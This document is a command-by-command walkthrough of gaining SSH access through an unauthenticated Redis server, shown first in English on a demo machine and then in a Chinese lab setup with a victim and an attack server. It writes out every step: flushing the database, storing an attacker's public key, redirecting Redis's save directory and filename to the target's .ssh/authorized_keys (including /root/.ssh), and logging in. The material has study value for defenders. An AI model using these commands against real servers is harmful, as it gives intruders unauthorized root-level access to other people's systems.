$ telnet 192.168.1.11 6379 Trying 192.168.1.11... Connected to 192.168.1.11. Escape character is '^]'. echo "Hey no AUTH required!" $21 Hey no AUTH required! quit +OK Connection closed by foreign host.
$ ssh-keygen -t rsa -C "[email protected]" Generating public/private rsa key pair. Enter file in which to save the key (/home/antirez/.ssh/id_rsa): ./id_rsa Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in ./id_rsa. Your public key has been saved in ./id_rsa.pub. The key fingerprint is: f0:a1:52:e9:0d:5f:e4:d9:35:33:73:43:b4:c8:b9:27 [email protected] The key's randomart image is: +--[ RSA 2048]----+ | . O+.| | . o o..o*o| | = . + .+ . | | o B o . | | . o S E . | | . o | | | | | | | +-----------------+
$ (echo -e "/n/n"; cat id_rsa.pub; echo -e "/n/n") > foo.txt
Now foo.txt is just our public key but with newlines. We can write this string inside the memory of Redis using redis-cli:
$ redis-cli -h 192.168.1.11 flushall
$ cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit
Looks good. How to dump our memory content into the authorized_keys file? That’s
$ redis-cli -h 192.168.1.11 192.168.1.11:6379> config set dir /Users/antirez/.ssh/ OK 192.168.1.11:6379> config get dir 1) "dir" 2) "/Users/antirez/.ssh" 192.168.1.11:6379> config set dbfilename "authorized_keys" OK 192.168.1.11:6379> save OK
At this point the target authorized keys file should be full of garbage, but should also include our public key. The string does not have simple patterns so it’s unlikely that it was compressed inside the RDB file. Will ssh be so naive to parse a totally corrupted file without issues, and accept the only sane entry inside?
$ ssh -i id_rsa [email protected] Enter passphrase for key 'id_rsa': Last login: Mon Nov 2 15:58:43 2015 from 192.168.1.10 ~ ➤ hostname Salvatores-MacBook-Air.local
###测试环境 ``` victim server CentOS6.6+redis2.4 192.168.192.133 attack server CentOS6.6 192.168.192.132 ``` 先在attack server生成一个公钥 ``` ssh-keygen -t rsa -C "redis" (echo -e "/n/n"; cat redis.pub; echo -e "/n/n") > redis.txt ``` 然后执行 ``` redis-cli -h 192.168.192.133 flushall cat redis.txt | redis-cli -h 192.168.192.133 -x set pwn ``` 登录redis并修改其配置 redis-cli -h 192.168.192.133 ``` CONFIG set dir /root/.ssh/ config set dbfilename "authorized_keys" save exit ``` 然后就可以使用ssh的公钥登录了 ``` ssh -i redis.pub [email protected] ```